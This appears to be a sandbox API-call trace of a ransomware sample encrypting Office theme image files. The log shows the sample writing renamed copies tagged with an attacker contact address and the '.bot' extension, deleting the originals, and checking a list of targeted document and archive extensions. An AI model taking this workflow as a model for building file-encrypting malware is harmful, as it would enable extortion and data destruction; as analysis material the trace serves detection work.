	[0045.574] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\preview.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0045.574] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214
	[0045.574] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.574] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.574] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\preview.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0046.609] GetLastError () returned 0x0
	[0046.609] ReadFile (in: hFile=0x214, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0xa2c, lpOverlapped=0x0) returned 1
	[0046.745] WriteFile (in: hFile=0x1a0, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xa30, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xa30, lpOverlapped=0x0) returned 1
	[0046.746] ReadFile (in: hFile=0x214, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0046.746] WriteFile (in: hFile=0x1a0, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0046.747] SetEndOfFile (hFile=0x1a0) returned 1
	[0046.747] CloseHandle (hObject=0x1a0) returned 1
	[0046.747] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0046.747] SetEndOfFile (hFile=0x214) returned 1
	[0046.748] CloseHandle (hObject=0x214) returned 1
	[0046.748] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0046.748] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\preview.gif")) returned 1
	[0046.748] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74
	[0046.748] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74
	[0046.748] lstrlenW (lpString=".doc") returned 4
	[0046.748] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0046.748] lstrlenW (lpString=".docx") returned 5
	[0046.748] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0046.748] lstrlenW (lpString=".pdf") returned 4
	[0046.748] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0046.748] lstrlenW (lpString=".xls") returned 4
	[0046.748] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0046.748] lstrlenW (lpString=".xlsx") returned 5
	[0046.748] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0046.748] lstrlenW (lpString=".ppt") returned 4
	[0046.749] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0046.749] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74
	[0046.749] lstrlenW (lpString=".zip") returned 4
	[0046.749] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0046.749] lstrlenW (lpString=".rar") returned 4
	[0046.749] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0046.749] lstrlenW (lpString=".bz2") returned 4
	[0046.749] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0046.749] lstrlenW (lpString=".7z") returned 3
	[0046.749] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0046.749] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74
	[0046.749] lstrlenW (lpString=".dbf") returned 4
	[0046.749] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0046.749] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74
	[0046.749] lstrlenW (lpString=".1cd") returned 4
	[0046.749] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0046.749] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74
	[0046.749] lstrlenW (lpString=".jpg") returned 4
	[0046.749] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0046.749] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74
	[0046.749] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74
	[0046.749] lstrlenW (lpString=".doc") returned 4
	[0046.749] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0046.749] lstrlenW (lpString=".docx") returned 5
	[0046.749] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0046.749] lstrlenW (lpString=".pdf") returned 4
	[0046.749] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0046.749] lstrlenW (lpString=".xls") returned 4
	[0046.749] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0046.749] lstrlenW (lpString=".xlsx") returned 5
	[0046.749] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0046.749] lstrlenW (lpString=".ppt") returned 4
	[0046.749] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0046.750] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74
	[0046.750] lstrlenW (lpString=".zip") returned 4
	[0046.750] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0046.750] lstrlenW (lpString=".rar") returned 4
	[0046.750] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0046.750] lstrlenW (lpString=".bz2") returned 4
	[0046.750] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0046.750] lstrlenW (lpString=".7z") returned 3
	[0046.750] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0046.750] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74
	[0046.750] lstrlenW (lpString=".dbf") returned 4
	[0046.750] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0046.750] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74
	[0046.750] lstrlenW (lpString=".1cd") returned 4
	[0046.750] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0046.750] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74
	[0046.750] lstrlenW (lpString=".jpg") returned 4
	[0046.750] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0046.750] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0046.750] lstrlenW (lpString="PREVIEW.GIF") returned 11
	[0046.750] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214
	[0046.751] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=3611) returned 1
	[0046.751] CloseHandle (hObject=0x214) returned 1
	[0046.751] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\preview.gif")) returned 0x20
	[0046.751] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\preview.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0046.751] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214
	[0046.751] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0046.751] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0046.751] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\preview.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c
	[0047.676] GetLastError () returned 0x0
	[0047.676] ReadFile (in: hFile=0x214, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0xe1b, lpOverlapped=0x0) returned 1
	[0047.678] WriteFile (in: hFile=0x21c, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xe20, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xe20, lpOverlapped=0x0) returned 1
	[0047.679] ReadFile (in: hFile=0x214, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0047.679] WriteFile (in: hFile=0x21c, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0047.679] SetEndOfFile (hFile=0x21c) returned 1
	[0047.679] CloseHandle (hObject=0x21c) returned 1
	[0047.680] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0047.680] SetEndOfFile (hFile=0x214) returned 1
	[0047.680] CloseHandle (hObject=0x214) returned 1
	[0047.681] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0047.681] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\preview.gif")) returned 1
	[0047.681] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73
	[0047.681] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73
	[0047.681] lstrlenW (lpString=".doc") returned 4
	[0047.681] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0047.681] lstrlenW (lpString=".docx") returned 5
	[0047.681] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0047.681] lstrlenW (lpString=".pdf") returned 4
	[0047.681] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0047.681] lstrlenW (lpString=".xls") returned 4
	[0047.681] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0047.681] lstrlenW (lpString=".xlsx") returned 5
	[0047.681] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0047.681] lstrlenW (lpString=".ppt") returned 4
	[0047.681] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0047.681] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73
	[0047.681] lstrlenW (lpString=".zip") returned 4
	[0047.681] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0047.681] lstrlenW (lpString=".rar") returned 4
	[0047.681] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0047.681] lstrlenW (lpString=".bz2") returned 4
	[0047.681] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0047.682] lstrlenW (lpString=".7z") returned 3
	[0047.682] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0047.682] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73
	[0047.682] lstrlenW (lpString=".dbf") returned 4
	[0047.682] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0047.682] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73
	[0047.682] lstrlenW (lpString=".1cd") returned 4
	[0047.682] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0047.682] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73
	[0047.682] lstrlenW (lpString=".jpg") returned 4
	[0047.682] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0047.682] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73
	[0047.682] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73
	[0047.682] lstrlenW (lpString=".doc") returned 4
	[0047.682] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0047.682] lstrlenW (lpString=".docx") returned 5
	[0047.682] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0047.682] lstrlenW (lpString=".pdf") returned 4
	[0047.682] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0047.682] lstrlenW (lpString=".xls") returned 4
	[0047.682] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0047.682] lstrlenW (lpString=".xlsx") returned 5
	[0047.682] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0047.682] lstrlenW (lpString=".ppt") returned 4
	[0047.682] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0047.682] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73
	[0047.682] lstrlenW (lpString=".zip") returned 4
	[0047.682] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0047.682] lstrlenW (lpString=".rar") returned 4
	[0047.682] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0047.682] lstrlenW (lpString=".bz2") returned 4
	[0047.682] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0047.682] lstrlenW (lpString=".7z") returned 3
	[0047.682] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0047.683] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73
	[0047.683] lstrlenW (lpString=".dbf") returned 4
	[0047.683] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0047.683] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73
	[0047.683] lstrlenW (lpString=".1cd") returned 4
	[0047.683] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0047.683] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73
	[0047.683] lstrlenW (lpString=".jpg") returned 4
	[0047.683] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0047.683] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0047.683] lstrlenW (lpString="PREVIEW.GIF") returned 11
	[0047.683] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214
	[0047.683] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=2527) returned 1
	[0047.683] CloseHandle (hObject=0x214) returned 1
	[0047.683] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\preview.gif")) returned 0x20
	[0047.684] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\preview.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0047.684] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214
	[0047.684] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0047.684] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0047.684] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\preview.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200
	[0047.686] GetLastError () returned 0x0
	[0047.686] ReadFile (in: hFile=0x214, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x9df, lpOverlapped=0x0) returned 1
	[0047.689] WriteFile (in: hFile=0x200, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x9e0, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x9e0, lpOverlapped=0x0) returned 1
	[0047.690] ReadFile (in: hFile=0x214, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0047.690] WriteFile (in: hFile=0x200, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0047.690] SetEndOfFile (hFile=0x200) returned 1
	[0047.690] CloseHandle (hObject=0x200) returned 1
	[0047.691] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0047.691] SetEndOfFile (hFile=0x214) returned 1
	[0047.691] CloseHandle (hObject=0x214) returned 1
	[0047.691] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0047.692] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\preview.gif")) returned 1
	[0047.692] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74
	[0047.692] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74
	[0047.692] lstrlenW (lpString=".doc") returned 4
	[0047.692] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0047.692] lstrlenW (lpString=".docx") returned 5
	[0047.692] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0047.692] lstrlenW (lpString=".pdf") returned 4
	[0047.692] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0047.692] lstrlenW (lpString=".xls") returned 4
	[0047.692] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0047.692] lstrlenW (lpString=".xlsx") returned 5
	[0047.692] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0047.692] lstrlenW (lpString=".ppt") returned 4
	[0047.692] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0047.692] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74
	[0047.692] lstrlenW (lpString=".zip") returned 4
	[0047.692] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0047.692] lstrlenW (lpString=".rar") returned 4
	[0047.692] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0047.692] lstrlenW (lpString=".bz2") returned 4
	[0047.692] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0047.692] lstrlenW (lpString=".7z") returned 3
	[0047.692] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0047.692] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74
	[0047.692] lstrlenW (lpString=".dbf") returned 4
	[0047.692] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0047.692] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74
	[0047.692] lstrlenW (lpString=".1cd") returned 4
	[0047.693] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0047.693] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74
	[0047.693] lstrlenW (lpString=".jpg") returned 4
	[0047.693] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0047.693] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74
	[0047.693] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74
	[0047.693] lstrlenW (lpString=".doc") returned 4
	[0047.693] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0047.693] lstrlenW (lpString=".docx") returned 5
	[0047.693] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0047.693] lstrlenW (lpString=".pdf") returned 4
	[0047.693] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0047.693] lstrlenW (lpString=".xls") returned 4
	[0047.693] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0047.693] lstrlenW (lpString=".xlsx") returned 5
	[0047.693] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0047.693] lstrlenW (lpString=".ppt") returned 4
	[0047.693] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0047.693] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74
	[0047.693] lstrlenW (lpString=".zip") returned 4
	[0047.693] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0047.693] lstrlenW (lpString=".rar") returned 4
	[0047.693] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0047.693] lstrlenW (lpString=".bz2") returned 4
	[0047.693] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0047.693] lstrlenW (lpString=".7z") returned 3
	[0047.693] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0047.693] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74
	[0047.693] lstrlenW (lpString=".dbf") returned 4
	[0047.693] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0047.693] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74
	[0047.693] lstrlenW (lpString=".1cd") returned 4
	[0047.693] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0047.693] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74
	[0047.694] lstrlenW (lpString=".jpg") returned 4
	[0047.694] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0047.694] lstrcmpiW (lpString1=".PNG", lpString2=".bot") returned 1
	[0047.694] lstrlenW (lpString="THMBNAIL.PNG") returned 12
	[0047.694] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214
	[0047.695] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=19525) returned 1
	[0047.695] CloseHandle (hObject=0x214) returned 1
